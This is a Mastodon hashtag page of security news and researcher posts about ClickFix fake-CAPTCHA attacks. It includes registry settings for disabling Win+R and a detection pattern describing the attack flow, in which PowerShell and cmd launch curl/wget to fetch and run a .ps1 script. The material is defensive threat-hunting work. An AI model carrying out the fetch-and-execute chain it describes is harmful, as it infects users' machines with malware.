mastodon.world is one of the many independent Mastodon servers you can use to participate in the fediverse.
Generic Mastodon server for anyone to use.

Server stats:

9K
active users

#clickfix

3 posts3 participants0 posts today
Threat Insight<p>State-sponsored threat actors often leverage techniques first developed and deployed by cybercriminal actors. One example is <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a>, a highly effective technique that involves clever <a href="https://infosec.exchange/tags/socialengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socialengineering</span></a>.</p><p>Listen as Proofpoint threat research experts Selena Larson, Sarah Sabotka, and Saher Naumaan deep dive into how modern <a href="https://infosec.exchange/tags/espionage" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>espionage</span></a> and <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> are increasingly blurring lines.</p><p>Stream DISCARDED now:<br>Apple Podcasts: <a href="https://brnw.ch/21wSNbM" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbM</span><span class="invisible"></span></a><br>Spotify: <a href="https://brnw.ch/21wSNbL" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbL</span><span class="invisible"></span></a><br>Web player: <a href="https://brnw.ch/21wSNbN" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">brnw.ch/21wSNbN</span><span class="invisible"></span></a></p>
Taggart :donor:<p>Reposting this since the first go-round coincided with some hosting trubz.</p><p>Here's a quick review of some of the easy wins against <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a>!</p><p><a href="https://taggart-tech.com/clickfix/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">taggart-tech.com/clickfix/</span><span class="invisible"></span></a></p>
2rZiKKbOU3nTafniR2qMMSE0gwZRansomware group uses ClickFix to attack businesses The Interlock ransomware group is using the C...<br><br><a href="https://www.kaspersky.co.uk/blog/interlock-ransomware-clickfix-attack/28962/" rel="nofollow noopener noreferrer" target="_blank">https://www.kaspersky.co.uk/blog/interlock-ransomware-clickfix-attack/28962/</a><br><br><a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Business" target="_blank">#Business</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Enterprise" target="_blank">#Enterprise</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/SMB" target="_blank">#SMB</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/attacks" target="_blank">#attacks</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/browsers" target="_blank">#browsers</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/Captcha" target="_blank">#Captcha</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/ClickFix" target="_blank">#ClickFix</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/cryptomalware" target="_blank">#cryptomalware</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/keyloggers" target="_blank">#keyloggers</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/PowerShell" target="_blank">#PowerShell</a> <a rel="nofollow noopener noreferrer" class="mention hashtag" href="https://mastodon.social/tags/ransomware" target="_blank">#ransomware</a><br><br><a href="https://awakari.com/pub-msg.html?id=GVzLMElRaPkGGclMuXH7ydyQXvU&amp;interestId=2rZiKKbOU3nTafniR2qMMSE0gwZ" rel="nofollow noopener noreferrer" target="_blank">Result Details</a>
Pyrzout :vm:<p>iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack – Source:hackread.com <a href="https://ciso2ciso.com/iclicker-website-hacked-with-fake-captcha-in-clickfix-attack-sourcehackread-com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/iclicker-website</span><span class="invisible">-hacked-with-fake-captcha-in-clickfix-attack-sourcehackread-com/</span></a> <a href="https://social.skynetcloud.site/tags/1CyberSecurityNewsPost" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>1CyberSecurityNewsPost</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttacks</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttack" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttack</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Hackread" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Hackread</span></a> <a href="https://social.skynetcloud.site/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://social.skynetcloud.site/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>security</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
Pyrzout :vm:<p>iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack <a href="https://hackread.com/iclicker-website-hacked-fake-captcha-clickfix-attack/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/iclicker-website-</span><span class="invisible">hacked-fake-captcha-clickfix-attack/</span></a> <a href="https://social.skynetcloud.site/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttacks</span></a> <a href="https://social.skynetcloud.site/tags/CyberAttack" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberAttack</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a></p>
Taggart :donor:<p>I think I have a nice compromise <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> ...fix for those places that just can't live without some Explorer niceties. </p><p>There is an alternative to the "Disable Windows shortcuts" GPO, which not only disables Win+ shortcuts, but also things like using UNC paths in the Explorer address bar. </p><p>Of course, Geoff Chappell <a href="https://www.geoffchappell.com/notes/windows/shell/explorer/globalhotkeys.htm" rel="nofollow noopener noreferrer" target="_blank">lights the way</a>.</p><p>I believe that GPO applies the <code>REST_NORUN</code> reg key and not <code>REST_NOWINKEYS</code> policies—despite the name.</p><p>If I apply the <code>REST_NORUN</code> reg setting directly, I get the same behavior as the GPO. The popup pictured here appears.</p><p>But if I instead set the <code>REST_NOWINKEYS</code> dialog, the Win+R shortcut is disabled, but other stuff (like UNC paths in explorer) still works! Now, this doesn't remove the Run command from the start menu, but it is at least a safety. Oh and one more thing: because that shortcut is now unregistered, you can register it yourself for something like a lil daemon that pops a message box saying <code>Hey did a website tell you to do this? Don't!</code></p><p>You can try both settings.</p><p><code>REST_NORUN</code>: <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun</code></p><p><code>REST_NOWINKEYS</code>: <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys</code></p><p><strong>UPDATE</strong>: You can additionally disable <em>only</em> Win+R by setting <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\Advanced\DisabledHotkeys</code> to a String value containing the Win shortcuts you want to disable. So a single <code>R</code> will do the trick. Note this only works at the user level.</p>
The New Oil<p>Hackers now testing <a href="https://mastodon.thenewoil.org/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> attacks against <a href="https://mastodon.thenewoil.org/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Linux</span></a> targets</p><p><a href="https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">bleepingcomputer.com/news/secu</span><span class="invisible">rity/hackers-now-testing-clickfix-attacks-against-linux-targets/</span></a></p><p><a href="https://mastodon.thenewoil.org/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://mastodon.thenewoil.org/tags/FOSS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FOSS</span></a></p>
Hackread.com<p>🚨 Popular student engagement platform iClicker’s website was hacked with a fake "I'm not a robot" check which is a textbook example of a ClickFix attack.</p><p>Read: <a href="https://hackread.com/iclicker-website-hacked-fake-captcha-clickfix-attack/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/iclicker-website-</span><span class="invisible">hacked-fake-captcha-clickfix-attack/</span></a></p><p><a href="https://mstdn.social/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a> <a href="https://mstdn.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://mstdn.social/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mstdn.social/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a></p>
nemo™ 🇺🇦<p>🚨 New ClickFix campaign alert! 🚨 This evolving cyberattack now targets both Windows &amp; Linux users by tricking them into running malicious console commands under the guise of “browser updates” or CAPTCHA tests. 🖥️🔒 Currently harmless but watch out! Threat actor: APT36 (Pakistan). Stay safe &amp; informed! 🔐 <a href="https://mas.to/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://mas.to/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mas.to/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Linux</span></a> <a href="https://mas.to/tags/Windows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Windows</span></a> <a href="https://mas.to/tags/APT36" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>APT36</span></a> <a href="https://mas.to/tags/InfoSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfoSec</span></a> <a href="https://mas.to/tags/TechRadar" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>TechRadar</span></a> <a href="https://mas.to/tags/newz" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>newz</span></a> </p><p>Read more: <a href="https://www.techradar.com/pro/security/new-clickfix-campaign-spotted-hitting-both-windows-and-linux-machines" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">techradar.com/pro/security/new</span><span class="invisible">-clickfix-campaign-spotted-hitting-both-windows-and-linux-machines</span></a></p>
LavX News<p>New ClickFix Attacks Target Linux: A Shift in Cyber Threat Landscape</p><p>In a surprising twist, hackers are now adapting ClickFix attacks to target Linux systems, previously dominated by Windows vulnerabilities. This development highlights the evolving tactics of cybercrim...</p><p><a href="https://news.lavx.hu/article/new-clickfix-attacks-target-linux-a-shift-in-cyber-threat-landscape" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/new-click</span><span class="invisible">fix-attacks-target-linux-a-shift-in-cyber-threat-landscape</span></a></p><p><a href="https://ioc.exchange/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://ioc.exchange/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://ioc.exchange/tags/LinuxSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LinuxSecurity</span></a> <a href="https://ioc.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://ioc.exchange/tags/APT36" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>APT36</span></a></p>
LavX News<p>New ClickFix Attacks Target Linux: A Shift in Cyber Threat Landscape</p><p>In a surprising twist, hackers are now adapting ClickFix attacks to target Linux systems, previously dominated by Windows vulnerabilities. This development highlights the evolving tactics of cybercrim...</p><p><a href="https://news.lavx.hu/article/new-clickfix-attacks-target-linux-a-shift-in-cyber-threat-landscape" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/new-click</span><span class="invisible">fix-attacks-target-linux-a-shift-in-cyber-threat-landscape</span></a></p><p><a href="https://mastodon.cloud/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://mastodon.cloud/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://mastodon.cloud/tags/LinuxSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LinuxSecurity</span></a> <a href="https://mastodon.cloud/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mastodon.cloud/tags/APT36" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>APT36</span></a></p>
CEOTECH.IT<p>Google scopre LostKeys: malware russo per lo spionaggio<br><a href="https://mastodon.social/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mastodon.social/tags/COLDRIVER" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>COLDRIVER</span></a> <a href="https://mastodon.social/tags/CyberEspionage" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberEspionage</span></a> <a href="https://mastodon.social/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybercrime</span></a> <a href="https://mastodon.social/tags/FSB" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FSB</span></a> <a href="https://mastodon.social/tags/Geopolitica" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Geopolitica</span></a> <a href="https://mastodon.social/tags/Google" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Google</span></a> <a href="https://mastodon.social/tags/LostKeys" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>LostKeys</span></a> <a href="https://mastodon.social/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://mastodon.social/tags/Notizie" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Notizie</span></a> <a href="https://mastodon.social/tags/Russia" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Russia</span></a> <a href="https://mastodon.social/tags/Sicurezza" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Sicurezza</span></a> <a href="https://mastodon.social/tags/Spionaggio" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Spionaggio</span></a> <a href="https://mastodon.social/tags/StateSponsoredHacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StateSponsoredHacking</span></a> <a href="https://mastodon.social/tags/TechNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>TechNews</span></a> <a href="https://mastodon.social/tags/Tecnologia" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Tecnologia</span></a> <a href="https://mastodon.social/tags/ThreatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntelligence</span></a> <a href="https://mastodon.social/tags/VBS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>VBS</span></a> </p><p><a href="https://www.ceotech.it/google-scopre-lostkeys-malware-russo-per-lo-spionaggio/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">ceotech.it/google-scopre-lostk</span><span class="invisible">eys-malware-russo-per-lo-spionaggio/</span></a></p>
LavX News<p>iClicker Hack: A Cautionary Tale of ClickFix Malware Targeting Students</p><p>In a concerning breach, the iClicker platform was compromised by a ClickFix attack, leading to a sophisticated malware distribution scheme targeting students and educators. This incident highlights th...</p><p><a href="https://news.lavx.hu/article/iclicker-hack-a-cautionary-tale-of-clickfix-malware-targeting-students" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/iclicker-</span><span class="invisible">hack-a-cautionary-tale-of-clickfix-malware-targeting-students</span></a></p><p><a href="https://ioc.exchange/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://ioc.exchange/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://ioc.exchange/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://ioc.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://ioc.exchange/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a></p>
LavX News<p>iClicker Hack: A Cautionary Tale of ClickFix Malware Targeting Students</p><p>In a concerning breach, the iClicker platform was compromised by a ClickFix attack, leading to a sophisticated malware distribution scheme targeting students and educators. This incident highlights th...</p><p><a href="https://news.lavx.hu/article/iclicker-hack-a-cautionary-tale-of-clickfix-malware-targeting-students" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.lavx.hu/article/iclicker-</span><span class="invisible">hack-a-cautionary-tale-of-clickfix-malware-targeting-students</span></a></p><p><a href="https://mastodon.cloud/tags/news" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>news</span></a> <a href="https://mastodon.cloud/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> <a href="https://mastodon.cloud/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://mastodon.cloud/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://mastodon.cloud/tags/iClicker" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iClicker</span></a></p>
Bob Carver<p>Macs under threat from thousands of hacked sites spreading malware — how to stay safe<br><a href="https://www.tomsguide.com/computing/online-security/macs-under-threat-from-thousands-of-hacked-sites-spreading-malware-how-to-stay-safe" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">tomsguide.com/computing/online</span><span class="invisible">-security/macs-under-threat-from-thousands-of-hacked-sites-spreading-malware-how-to-stay-safe</span></a><br><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/Apple" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Apple</span></a> <a href="https://infosec.exchange/tags/Macs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Macs</span></a> <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/socialengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socialengineering</span></a></p>
Pyrzout :vm:<p>ClickFix Scam: How to Protect Your Business Against This Evolving Threat <a href="https://hackread.com/clickfix-scam-how-to-protect-business-againt-threat/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">hackread.com/clickfix-scam-how</span><span class="invisible">-to-protect-business-againt-threat/</span></a> <a href="https://social.skynetcloud.site/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/Scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Scam</span></a></p>
Pyrzout :vm:<p>ClickFix Scam: How to Protect Your Business Against This Evolving Threat – Source:hackread.com <a href="https://ciso2ciso.com/clickfix-scam-how-to-protect-your-business-against-this-evolving-threat-sourcehackread-com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/clickfix-scam-ho</span><span class="invisible">w-to-protect-your-business-against-this-evolving-threat-sourcehackread-com/</span></a> <a href="https://social.skynetcloud.site/tags/1CyberSecurityNewsPost" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>1CyberSecurityNewsPost</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://social.skynetcloud.site/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> <a href="https://social.skynetcloud.site/tags/Hackread" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Hackread</span></a> <a href="https://social.skynetcloud.site/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://social.skynetcloud.site/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>security</span></a> <a href="https://social.skynetcloud.site/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://social.skynetcloud.site/tags/Scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Scam</span></a></p>
Taggart :donor:<p>FWIW, 100% of <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> attacks I've seen have added some kind of inline comment at the end of the command string like <code>I am not a robot</code> to sell the ruse. Definitely worth a threat hunt on command line history.</p><p><a href="https://infosec.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatHunting</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/ThreatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntelligence</span></a></p>
Saltmyhash<p>Examine your EDR telemetry or other process command logs for the following <a href="https://infosec.exchange/tags/clickfix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>clickfix</span></a> flow:</p><p>Explorer.exe -&gt; powershell.exe -&gt; cmd.exe -&gt; curl/wget to grab a .ps1 -&gt; powershell.exe</p><p>The above flow was initiated using a Cloudflare Captcha challenge on a compromised website which fooled the victim into running the clipboard command. Also, look out for internet traffic which sources from copilot.exe. It won’t have a referrer in proxy logging which made figuring out where or how the victim initially hit the clickfix domain difficult. EDR telemetry ultimately showed copilot.exe making the initial netconn to the clickfix domain. Microsoft purview analysis of copilot was needed to figure out what the victim entered in the prompt to drive them to compromised site hosting the clickfix payload. </p><p>Mitigation is to recommend restricting cmd.exe or powershell.exe execution to privileged groups only. Bob in the C-suite shouldn’t be able to use run to execute cmd.exe commands copied to his clipboard. Scope usage of cmd/powershell so you don’t blow up legitimate patching or remote assistance efforts. Also, know if copilot is on in your org and restrict or create privileged groups who need it. </p><p>Almost every threat actor I track now is using clickfix technique, apparently because it works. Users are more than happy to self-diagnose problems or solve bogus captchas by doing what prompts tell them to do. </p><p><a href="https://infosec.exchange/tags/soc" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>soc</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/clickfix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>clickfix</span></a></p>
Brad<p>2025-04-22 (Tuesday): Always fun to find the fake CAPTCHA pages with the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClickFix</span></a> style instructions trying to convince viewers to infect their computers with malware. </p><p>Saw <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> from an infection today. </p><p>Indicators available at <a href="https://github.com/malware-traffic/indicators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/malware-traffic/ind</span><span class="invisible">icators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt</span></a></p><p><a href="https://infosec.exchange/tags/ClipboardHijacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ClipboardHijacking</span></a> <a href="https://infosec.exchange/tags/Pastejacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Pastejacking</span></a></p>